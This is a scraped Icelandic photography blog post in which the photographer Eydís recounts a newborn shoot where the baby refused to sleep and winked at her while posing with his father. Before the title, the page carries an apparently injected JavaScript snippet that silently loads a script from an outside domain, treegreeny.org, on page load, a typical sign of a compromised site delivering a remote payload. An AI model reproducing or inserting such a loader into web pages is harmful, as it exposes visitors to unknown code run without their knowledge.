;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Blikkaði til mín – Eydís — Ljósmyndun

Blikkaði til mín

Hann var í ungbarnamyndatöku, pínu peð, var ekkert á því að sofa og vera í einhverjum krúttpósum. Vildi bara vaka og skoða í kringum sig.  Ég fór því að mynda hann með pabba sínum og þá komst sá stutti í þvílíkt stuð. Blikkaði mig eins og til að segja ; nú ertu á réttri leið. Ég gat ekki stillt mig um að hlæja enda ótrúlegur karakter þarna á ferð. Ég hlakka til að mynda hann þegar hann eldist og ég fæ að kynnast honum betur.  Hann mun örugglega halda foreldrum sínum við efnið.

blikkandistrakurt

Leave a Reply

Your email address will not be published. Required fields are marked *